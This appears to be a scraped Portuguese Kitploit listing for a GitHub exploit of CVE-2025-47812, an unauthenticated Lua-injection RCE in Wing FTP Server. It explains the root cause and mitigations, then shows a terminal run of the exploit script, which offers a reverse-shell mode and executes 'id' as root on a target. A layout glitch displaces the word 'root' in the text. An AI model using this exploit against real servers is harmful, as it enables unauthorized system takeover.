Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
Ferramentas/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2025-47812 – RCE Crítico no Wing FTP Server 🛡️

🔎 Visão Geral:

A CVE-2025-47812 é uma vulnerabilidade crítica de execução remota de código (RCE) que afeta o Wing FTP Server em versões anteriores à 7.4.4. Foi descoberta por um pesquisador de segurança e foi confirmado que está sendo ativamente explorada no mundo real.


🧱 Causa Raiz:

A vulnerabilidade está na lógica de autenticação do Wing FTP Server, especificamente na forma como ele lida com bytes nulos (\0) no parâmetro username.

Os atacantes podem injetar código Lua arbitrário através do campo de nome de usuário, que o servidor grava no arquivo de sessão. Quando esse arquivo de sessão é processado posteriormente, o código Lua injetado é executado, permitindo que os atacantes executem comandos a nível de sistema.


🚨 Impacto:

  • Severidade: Pontuação CVSS de 10.0 (Crítico)
  • Acesso Necessário: Acesso não autenticado ou anônimo é suficiente
  • Exploração: Exploração ativa confirmada
  • Privilégios Obtidos: O código é executado como SYSTEM (Windows) ou (Linux/macOS)
Baixar ferramenta
root
  • Plataformas Afetadas: Windows, Linux e macOS

  • 🔧 Mitigação:

    • Atualize imediatamente para o Wing FTP Server versão 7.4.4 ou posterior.
    • Garanta que servidores FTP públicos não estejam expondo /loginok.html a redes não confiáveis.
    • Monitore os logs em busca de nomes de usuário incomuns ou injeções de código Lua.
    • Implemente segmentação de rede para isolar os serviços FTP da infraestrutura interna.

    💀 Exploit:

    root@kitploit:~
    ┌──(kali㉿kali)-[~]
    └─$ sudo python3 CVE-2025-47812.py
    ============================================================
       CVE-2025-47812 - Wing FTP Server RCE Exploit
    ============================================================
    Target URL (e.g., http://localhost:5466): http://10.10.10.10
    Username (e.g., anonymous): anonymous
    1) Run Command
    2) Get Reverse Shell
    Your choice (1 or 2): 1
    Command to execute (default: whoami): id
    [*] Trying to get UID... Payload: id
    [*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
    [*] Sending /dir.html request...
    [*] HTTP 200
    ------ Response Start ------
    uid=0(root) gid=0(root) groups=0(root)
    <?xml version="1.0" encoding="UTF-8" ?>
    <alldata><nowdir><![CDATA[/]]></nowdir>
    <dirdata>
    </dirdata>
    <nowquota>0</nowquota>
    <maxquota>0</maxquota>
    <readfile>1</readfile>
    </alldata>
    
    
    ------ Response End ------
    

    ⚠️ Aviso Legal

    Este exploit é fornecido apenas para fins educacionais. Use-o com responsabilidade e somente em sistemas nos quais você tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.